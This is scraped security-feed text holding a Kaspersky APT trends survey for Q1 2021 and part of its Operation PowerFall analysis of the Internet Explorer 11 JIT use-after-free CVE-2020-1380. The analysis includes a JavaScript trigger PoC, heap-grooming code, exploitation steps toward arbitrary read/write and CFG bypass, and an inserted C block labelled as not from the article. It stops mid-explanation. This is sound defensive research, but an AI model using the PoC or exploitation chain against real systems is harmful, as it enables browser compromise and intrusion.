This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation. Further investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group. The shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. 
Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. Prior to the posts, on February 28, we identified related exploitation on less than a dozen Exchange systems; we also found more than a dozen Exchange artefacts indicating exploitation uploaded to multi-scanner services. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits are now available to multiple groups.\n\nWe have also discovered a campaign active since mid-March targeting governmental entities in the Russian Federation, using the aforementioned Exchange zero-day exploits. This campaign made use of a previously unknown malware family we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\n## Europe\n\nDuring routine monitoring of detections for FinFisher spyware tools, we discovered traces that point to recent FinFly Web deployments. In particular, we discovered two servers with web applications that we suspect, with high confidence, were generated using FinFly Web. FinFly Web is, in essence, a suite of tools and packages that implement a web-based exploitation server. It was first publicly documented in 2014, in the aftermath of the Gamma Group hacking incident. One of the suspected FinFly Web servers was active for more than a year between October 2019 and December 2020. 
This server was disabled a day after our discovery last December. Nevertheless, we were able to capture a copy of its landing page, which included JavaScript used to profile victims using what appears to be previously unknown code. In the second case, the server hosting FinFly Web was already offline at the moment of discovery, so we drew our conclusions using available historical data. As it turned out, it was active for a very short time around September 2020 on a host that appears to have been impersonating the popular Mail.ru service. Surprisingly, this server began answering queries again on January 12. So far, we haven't seen any related payloads being dropped by these web pages.\n\n## Russian-speaking activity\n\nKazuar is a .NET backdoor usually associated with the Turla threat actor (aka Snake and Uroboros). Recently, Kazuar received renewed interest due to its similarities with the Sunburst backdoor. Although the capabilities of Kazuar have already been exposed in public research, many interesting facts about this backdoor were not made public. Our latest reports focus on the changes the threat actor made to the September and November versions of its backdoor.\n\nOn February 24, the National Security Defense Council of Ukraine (NSDC) publicly warned that a threat actor had exploited a national documents circulation system (SEI EB) to distribute malicious documents to Ukrainian public authorities. The alert contained a few related network IoCs, and specified that the documents used malicious macros in order to drop an implant onto targeted systems. Thanks to the shared IoCs, we were able to attribute this attack, with high confidence, to the Gamaredon threat actor. 
The malicious server IP mentioned by the NSDC has been known to Kaspersky since February as Gamaredon infrastructure.\n\nOn January 27, the French national cybersecurity agency (ANSSI) published a report describing an attack campaign that targeted publicly exposed and obsolete Centreon systems between 2017 and 2020, in order to deploy Fobushell (aka P.A.S.) webshells and Exaramel implants. ANSSI associated the campaign with the Sandworm intrusion-set, which we refer to as Hades. Although we specifically looked for additional compromised Centreon systems, Exaramel implant samples or associated infrastructure, we were unable to retrieve any useful artifacts from which we could initiate a comprehensive investigation. However, we did identify three Centreon servers where a Fobushell webshell had been deployed. One of those Fobushell samples was identical to another we previously identified on a Zebrocy C2 server.\n\n## Chinese-speaking activity\n\nWe discovered a set of malicious activities, which we named EdwardsPheasant, targeting mainly government organizations in Vietnam since June 2020. The attackers leverage previously unknown and obfuscated backdoors and loaders. The activities peaked in November 2020, but are still ongoing. The associated threat actor continues to leverage its tools and tactics (described in our private report) to compromise targets or maintain access in their networks. While we could identify similarities with the tools and tactics associated with Cycldek (aka Goblin Panda) and Lucky Mouse (aka Emissary Panda), we have been unable to attribute this set of activities to either of them conclusively.\n\nWe investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. 
The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our [public report](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Middle East\n\nWe recently came across previously unknown malicious artifacts that we attributed to the Lyceum/Hexane threat group, showing that the attackers behind it are still active and have been developing their toolset during the last year. Although Lyceum still prefers taking advantage of DNS tunneling, it appears to have replaced the previously documented .NET payload with a new C++ backdoor and a PowerShell script that serve the same purpose. Our telemetry revealed that the threat group's latest endeavors are focused on going after entities within one country \u2013 Tunisia. The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies. Based on the targeted industries, we assume that the attackers may have been interested in compromising these entities to track the movements and communications of individuals that are of interest to them. 
This could mean that the latest Lyceum cluster has an operational focus on targeting Tunisia, or that it is a subset of broader activity that is yet to be discovered.\n\nOn November 19, 2020, Shadow Chaser Group tweeted about a suspected MuddyWater APT malicious document potentially targeting a university in the United Arab Emirates. Based on our analysis since then, we suspect this intrusion is part of a campaign that started at least in early October 2020 and was last seen active in late December 2020. The threat actor relied on VBS-based malware to infect organizations from government, NGO and education sectors. Our telemetry, however, indicates that no further tools were deployed and we do not believe that data theft took place either. This indicates to us that the attackers are currently in the reconnaissance phase of their operation, and we expect subsequent waves of attacks to follow in the near future. In our private report, we provide an in-depth analysis of the malicious documents used by this threat actor and study their similarities to known MuddyWater tooling. The infrastructure setup and communications scheme are also similar to past incidents attributed to this group. The actor maintains a small set of first-stage C2 servers to connect back from the VBS implant for initial communications. Initial reconnaissance is performed by the actor and communication with the implant is handed off to a second-stage C2 for additional downloads. Finally, we present similarities with known TTPs of the MuddyWater group and attribute this campaign to them with medium confidence.\n\nDomestic Kitten is a threat group mainly known for its mobile backdoors. The group's operations were exposed in 2018, showing that it was conducting surveillance attacks against individuals in the Middle East. The threat group targeted Android users by sending them popular and well-known applications that were backdoored and contained malicious code. 
Many of the applications had religious or political themes and were intended for Farsi, Arabic and Kurdish speakers, possibly alluding to this attack's main targets. We have discovered new evidence showing that Domestic Kitten has been using PE executables to target victims using Windows since at least 2013, with some evidence that it goes back to 2011. The Windows version, which, to the best of our knowledge, has not been described in the past, was delivered in several versions, with the more recent one used for at least three and a half years to target individuals in parallel to the group's mobile campaigns. The implant functionality and infrastructure in that version have remained the same all along, and have been used in the group's activity witnessed this year.\n\nFerocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar and, to the best of our knowledge, has not been covered by security researchers. It only recently attracted attention when a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. We have been able to expand some of the findings on the group and provide insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's machine. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. 
For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point. In our private report, we expand the details on these findings as well as provide analysis and mechanics of the MarkiRAT malware.\n\nKarkadann is a threat actor that has been targeting government bodies and news outlets in the Middle East since at least October 2020. The threat actor leverages tailor-made malicious documents with embedded macros that trigger an infection chain, opening a URL in Internet Explorer. The minimal functionality present in the macros and the browser specification suggest that the threat actor might be exploiting a privilege-escalation vulnerability in Internet Explorer. Despite the small amount of evidence available for analysis in the Karkadann case, we were able to find several similarities to the Piwiks case, a watering-hole attack we discovered that targeted multiple prominent websites in the Middle East. Our private report presents the recent Karkadann campaigns and the similarities between this campaign and the Piwiks case. The report concludes with some infrastructure overlaps with unattributed clusters that we have seen since last year that are potentially linked to the same threat actor.\n\n## Southeast Asia and Korean Peninsula\n\nWe discovered that the Kimsuky group adopted a new method to deliver its malware in its latest campaign on a South Korean stock trading application. In this campaign, beginning in December 2020, the group compromised a website belonging to the vendor of stock trading software, replacing the hosted installation package with a malicious one. Kimsuky also delivered its malware by utilizing a malicious Hangul (HWP) document containing COVID-19-related bait that discusses a government relief fund. 
Both infection vectors ultimately deliver the Quasar RAT. Compared to Kimsuky's last reported infection chain, composed of various scripts, the new scheme adds complications and introduces less popular file types, involving VBS scripts, XML and Extensible Stylesheet Language (XSL) files with embedded C# code in order to fetch and execute stagers and payloads. Based on the lure document and characteristics of the compromised installation package, we conclude that this attack is financially motivated, which, as we have previously reported, is one of Kimsuky's main focus areas.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a North Korean-related threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog and installed a Chrome exploit. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We can confirm that several infrastructures on the blog overlap with our previously published reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data, analyzing logs and files present on the servers. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. 
We found a relatively large number of hosts communicating with the C2s at the time of our research. You can read our public report [here](<https://securelist.com/lazarus-threatneedle/100803/>).\n\nFollowing up our previous investigation into Lazarus attacks on the defense industry using ThreatNeedle, we discovered another malware cluster named CookieTime used in a campaign mainly focused on the defense industry. We detected activity in September and November 2020, with samples dating back to April 2020. Compared to the already known malware clusters of the Lazarus group, CookieTime shows a different structure and functionality. This malware communicates with the C2 server using the HTTP protocol. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. The C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results. We had a chance to look into the command and control script as a result of working closely with a local CERT to take down the threat actor's infrastructure. The malware control servers are configured in a multi-stage fashion and only deliver the command file to valuable hosts.\n\nWhile investigating the artifacts of a supply-chain attack on the Vietnam Government Certification Authority's (VGCA) website, we discovered that the first Trojanized package dates to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins deployed using PhantomNet malware, which was delivered using Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware. 
In our private report, we offer a detailed description for each post-compromise tool used in the attack, as well as other tools belonging to the actor's arsenal. Finally, we also explore CoughingDown attribution in the light of recent discoveries.\n\nOn February 10, DBAPPSecurity published details about a zero-day exploit they discovered last December. Aside from the details of the exploit itself, researchers also mentioned it being used in the wild by BitterAPT. While no such subsequent information was given in the initial report to explain the attribution claims, our investigation into this activity confirms the exploit was in fact being used exclusively by this actor. We assigned the name TurtlePower to the campaign that makes use of this exploit, along with the other tools used to target governmental and telecom entities in Pakistan and China. We have also confidently linked the origin of this exploit to a broker we refer to as Moses. Moses has been responsible for the development of at least five exploits patched in the last two years. We have also been able to tie the usage of some of these exploits to at least two different actors thus far \u2013 BitterAPT and DarkHotel. At this time, it is unclear how these threat actors are obtaining exploits from Moses, whether it is through direct purchase or another third-party provider. During the TurtlePower campaign, BitterAPT used a wide array of tools on its victims to include a stage one payload named ArtraDownloader, a stage two payload named Splinter, a keylogger named SourLogger, an infostealer named SourFilling, as well as variations of Mimikatz to gather specific files and maintain its access. This particular campaign also appears to be narrowly focused on targets within Pakistan and China (based on the initial report referenced). While we can verify specific targeting within Pakistan using our own data, we have not been able to do the same regarding China. 
Use of CVE-2021-1732 peaked between June and July 2020, but the overall campaign is still ongoing.\n\nIn 2020, we observed new waves of attacks related to Dropping Elephant (aka Patchwork, Chinastrats), focusing on targets in China and Pakistan. We also noted a few targets outside of the group's traditional area of operations, namely in the Middle East, and a growing interest in the African continent. The attacks followed the group's well-established TTPs, which include the use of malicious documents crafted to exploit a remote code execution vulnerability in Microsoft Office, and the signature JakyllHyde (aka BadNews) Trojan in the later infection stages. Dropping Elephant introduced a new loader for JakyllHyde, a tool we named Crypta. It contains mechanisms to hinder detection and appears to be a core component of this APT actor's recent toolset. Crypta and its variants have been observed in multiple scenarios loading a wide range of subsequent payloads, such as Bozok RAT, Quasar RAT and LokiBot. An additional Trojan discovered during our research was PubFantacy. To our knowledge, this tool has never been publicly described and has been used to target Windows servers since at least 2018.\n\nWe recently discovered a previously publicly unknown Android implant used in 2018-2019 by the SideWinder threat group, which we dubbed BroStealer. The main purpose of the BroStealer implant is to collect sensitive information from a victim's device, such as photos, SMS messages, call recordings and files from various messaging applications. Although SideWinder has numerous campaigns against victims using the Windows platform, recent reports have shown that this threat group also goes after its targets via the mobile platform.\n\n## Other interesting discoveries\n\nIn February 2019, multiple antivirus companies received a collection of malware samples, most of them associated with various known APT groups. Some of the samples cannot be associated with any known activity. 
Some, in particular, attracted our attention due to their sophistication. The samples were compiled in 2014 and, accordingly, were likely deployed in 2014 and possibly as late as 2015. Although we have not found any shared code with any other known malware, the samples have intersections of coding patterns, style and techniques that have been seen in various [Lambert families](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>). We therefore named this malware Purple Lambert. Purple Lambert is composed of several modules, with its network module passively listening for a magic packet. It is capable of providing an attacker with basic information about the infected system and executing a received payload. Its functionality reminds us of Gray Lambert, another user-mode passive listener. Gray Lambert turned out to be a replacement of the kernel-mode passive-listener White Lambert implant in multiple incidents. In addition, Purple Lambert implements functionality similar to, but in different ways, both Gray Lambert and White Lambert. Our report, available to subscribers of our APT threat reports, includes discussion of both the passive-listener payload and the loader functionality included in the main module.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q1 2021:\n\n * Perhaps the most predominant attack we researched in this quarter was the SolarWinds attack. SolarWinds showed once again how successful a supply-chain attack can be, especially where attackers go the extra mile to remain hidden and maintain persistence in a target network. 
The scope of this attack is still being investigated as more zero-day flaws are discovered in SolarWinds products.\n * Another critical wave of attacks was the exploitation of Microsoft Exchange zero-day vulnerabilities by multiple threat actors. We recently discovered another campaign using these exploits with different targeting, possibly related to the same cluster of activities already reported.\n * Lazarus group's bold campaign targeting security researchers worldwide also utilized zero-day vulnerabilities in browsers to compromise their targets. Their campaigns used themes centered on the use of zero-days to lure relevant researchers, possibly in an attempt to steal vulnerability research.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2021-04-27T10:00:26", "type": "securelist", "title": "APT trends report Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-04-27T10:00:26", "id": "SECURELIST:A10F281EF99381636376D6F6C6501E22", "href": "https://securelist.com/apt-trends-report-q1-2021/101967/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-13T08:04:21", "description": "\n\n## Executive summary\n\nIn May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. 
Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nOn June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability [CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>) that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.\n\nMicrosoft assigned [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe are calling this and related attacks 'Operation PowerFall'. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.\n\n## Internet Explorer 11 remote code execution exploit\n\nThe most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. 
In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the [mitigation steps](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>) recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.\n\nCVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. A proof-of-concept (PoC) that triggers the vulnerability is demonstrated below:\n \n \n function func(O, A, F, O2) {\n     arguments.push = Array.prototype.push;\n     O = 1;\n     arguments.length = 0;\n     arguments.push(O2);\n     if (F == 1) {\n         O = 2;\n     }\n \n     // execute abp.valueOf() and write by dangling pointer\n     A[5] = O;\n };\n \n // prepare objects\n var an = new ArrayBuffer(0x8c);\n var fa = new Float32Array(an);\n \n // compile func\n func(1, fa, 1, {});\n for (var i = 0; i < 0x10000; i++) {\n     func(1, fa, 1, 1);\n }\n \n var abp = {};\n abp.valueOf = function() {\n \n     // free \n     worker = new Worker('worker.js');\n     worker.postMessage(an, [an]);\n     worker.terminate();\n     worker = null;\n \n     // sleep\n     var start = Date.now();\n     while (Date.now() - start < 200) {}\n \n     // TODO: reclaim freed memory\n \n     return 0\n };\n \n try {\n     func(1, fa, 0, abp);\n } catch (e) {\n     reload()\n }\n\nTo understand this vulnerability, let us take a look at how _func()_ is executed. It is important to understand what value is set to _A[5]_. According to the code, it should be the _O_ argument. At function start, the _O_ argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear the function arguments (as it would normally do with a regular array) but allows the argument _O2_ to be put into the arguments list at index zero using Array.prototype.push, meaning _O_ = _O2_ now. 
Besides that, if the argument _F_ is equal to 1, then _O_ will be re-assigned once again, but to the integer number 2. It means that depending on the value of the _F_ argument, the _O_ argument is equal to either the value of the _O2_ argument or the integer number 2. The argument _A_ is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it becomes less straightforward when an object is converted to a float number. The exploit uses the object _abp_ with an overridden _valueOf()_ method. This method is executed when the object is converted to a float, but inside the method there is code that frees the ArrayBuffer, which is viewed by the Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_. 
You can see the decompiled code of this function below:\n \n \n int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved)\n {\n     Js::JavascriptConversion::ToNumber(object, this->type->library->context);\n     if ( LOBYTE(this->view[0]->unusable) )\n         Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0);\n     if ( index < this->count )\n     {\n         *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber(\n             object,\n             this->type->library->context);\n     }\n     return 1;\n }\n \n double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context)\n {\n     if ( (unsigned char)object & 1 )\n         return (double)((int)object >> 1);\n     if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] )\n         return *((double *)object + 1);\n     return Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nThis function checks the _view[0]->unusable_ and _count_ fields of the typed float array, and when the ArrayBuffer is freed during execution of the _valueOf()_ method, both of these checks will fail because _view[0]->unusable_ will be set to 1 and _count_ will be set to 0 during the first call to _Js::JavascriptConversion::ToNumber()_. 
The problem lies in the fact that the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_ is used only in interpretation mode.\n\nWhen the function _func()_ is compiled just in time, the JavaScript engine will use the vulnerable code below.\n \n \n if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable )\n {\n     if ( floatArray->count > index )\n     {\n         buffer = floatArray->buffer + 4*index;\n         if ( object & 1 )\n         {\n             *(float *)buffer = (double)(object >> 1);\n         }\n         else\n         {\n             if ( *(void *)object != &Js::JavascriptNumber::vftable )\n             {\n                 Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context);\n             }\n             else\n             {\n                 *(float *)buffer = *(double *)(object->value);\n             }\n         }\n     }\n }\n\nAnd here is the code of the _Js::JavascriptConversion::ToFloat_Helper()_ function.\n \n \n void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context)\n {\n     *buffer = Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nAs you can see, unlike in interpretation mode, in just-in-time compiled code the life cycle of the ArrayBuffer is not checked, and its memory can be freed and then reclaimed during a call to the _valueOf()_ function. Additionally, the attacker can control at what index the returned value is written. However, if "arguments.length = 0;" and "arguments.push(O2);" are replaced in the PoC with "arguments[0] = O2;", then _Js::JavascriptConversion::ToFloat_Helper()_ will not trigger the bug, because implicit calls will be disabled and it will not perform a call to the _valueOf()_ function.\n\nTo ensure that the function _func()_ is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that is _func()_ executed once more, triggering the bug. To free the ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. 
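The interpreter-versus-JIT difference described above, as an added C model that is not code from the original article or from jscript9.dll: a typed-array element store whose value conversion may run a script callback (valueOf) that detaches the backing ArrayBuffer. The structure and function names are hypothetical stand-ins for Js::TypedArray<float,0>::BaseTypedDirectSetItem() and the compiled path; the "freed" memory is modelled as a buffer handed to a new owner and filled with a canary, and index 5 is used so the stale write lands at byte offset 0x14, as in the exploit.

```c
/* Added C model (not from the article or jscript9.dll) of the two store paths
 * discussed above. A typed-array element store converts the value first; that
 * conversion can run script (valueOf), which may detach the ArrayBuffer. */
#include <stdio.h>
#include <string.h>

#define SLOTS 6                       /* 6 floats: index 5 is byte offset 0x14 */

typedef struct {
    float   *buffer;                  /* backing store of the ArrayBuffer */
    unsigned count;                   /* element count; 0 once detached */
    int      unusable;                /* view[0]->unusable in the article */
} typed_array_t;

/* Storage the ArrayBuffer occupies. After "detach" we pretend the allocator
 * handed it to a new owner (the LargeHeapBlock in the exploit) and fill it
 * with a canary so a stale write can be detected. */
static float g_storage[SLOTS];
static const unsigned char CANARY = 0xA5;

/* Models Js::JavascriptConversion::ToNumber(): may run script. */
typedef double (*to_number_fn)(typed_array_t *arr);

static double harmless_value_of(typed_array_t *arr) { (void)arr; return 1.5; }

/* Models abp.valueOf() from the PoC: detach the buffer mid-store, let its
 * memory be reused, and return 0, the value the exploit wants written. */
static double detaching_value_of(typed_array_t *arr) {
    arr->unusable = 1;
    arr->count = 0;
    memset(g_storage, CANARY, sizeof g_storage);   /* new owner's data */
    return 0.0;
}

/* Interpreter path, as BaseTypedDirectSetItem(): convert, then re-validate
 * `unusable` and `count` before touching the buffer.
 * Returns 1 if stored, 0 if out of range, -1 if the buffer was detached. */
static int set_item_interpreter(typed_array_t *arr, unsigned idx, to_number_fn conv) {
    double v = conv(arr);                      /* implicit call, may detach */
    if (arr->unusable) return -1;              /* TypeError in the real engine */
    if (idx >= arr->count) return 0;
    arr->buffer[idx] = (float)v;
    return 1;
}

/* JIT path, as the compiled code quoted above: bounds check and slot address
 * are taken before the conversion and never re-validated afterwards. */
static int set_item_jit_unchecked(typed_array_t *arr, unsigned idx, to_number_fn conv) {
    if (idx >= arr->count) return 0;
    float *slot = arr->buffer + idx;           /* computed before the implicit call */
    *slot = (float)conv(arr);                  /* may now be a stale pointer */
    return 1;
}

static void reset_array(typed_array_t *arr) {
    memset(g_storage, 0, sizeof g_storage);
    arr->buffer = g_storage;
    arr->count = SLOTS;
    arr->unusable = 0;
}

/* 1 if the new owner's canary survived the store, 0 if it was corrupted. */
static int canary_intact(void) {
    const unsigned char *p = (const unsigned char *)g_storage;
    for (size_t i = 0; i < sizeof g_storage; i++)
        if (p[i] != CANARY) return 0;
    return 1;
}

/* Value currently in slot `idx` (used for the benign case). */
static float stored_float(unsigned idx) { return g_storage[idx]; }

/* Run one store through the interpreter (jit == 0) or JIT (jit == 1) path.
 * Returns the path's status; *corrupted reports whether the recycled memory
 * was modified through the stale pointer. */
static int run_store(int jit, to_number_fn conv, int *corrupted) {
    typed_array_t arr;
    reset_array(&arr);
    int st = jit ? set_item_jit_unchecked(&arr, 5, conv)
                 : set_item_interpreter(&arr, 5, conv);
    *corrupted = (conv == detaching_value_of) && !canary_intact();
    return st;
}

int main(void) {
    int c;
    int a = run_store(0, detaching_value_of, &c);
    printf("interpreter: status %d, recycled memory corrupted: %d\n", a, c);
    int b = run_store(1, detaching_value_of, &c);
    printf("jit        : status %d, recycled memory corrupted: %d\n", b, c);
    return 0;
}
```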
The function _postMessage()_ can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When the ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the _Sleep()_ function: it is a while loop that checks for the time lapse between _Date.now()_ and the previously stored value. After that, the exploit reclaims the memory with integer arrays.\n \n \n for (var i = 0; i < T.length; i += 1) {\n     T[i] = new Array((0x1000 - 0x20) / 4);\n     T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket\n }\n\nWhen a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE's custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at offset 0x14 of the LargeHeapBlock with 0, which happens to be the allocated block count.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png>)\n\n**_LargeHeapBlock structure for jscript9.dll x86_**\n\nAfter that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the _CollectGarbage()_ function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large number of integer arrays in hopes of reclaiming the previously freed array buffers. 
The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.\n \n \n for (var i = 0; i < K.length; i += 1) {\n K[i] = new Array((0x1000 - 0x20) / 4);\n K[i][0] = 0x888; // store magic\n }\n \n for (var i = 0; i < T.length; i += 1) {\n if (T[i][0] == 0x888) { // find array accessible through dangling pointer\n R = T[i];\n break;\n }\n }\n\nAs a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.\n\nAfter the building of the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array's vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function _VirtualProtect()_, which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string "split" and the address of the function: _JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>()_. The address of the Unicode string "split" is used to get a code reference to the string and with its help, to resolve the address of the function _Js::JavascriptString::EntrySplit()_, which implements the string method _split()_. 
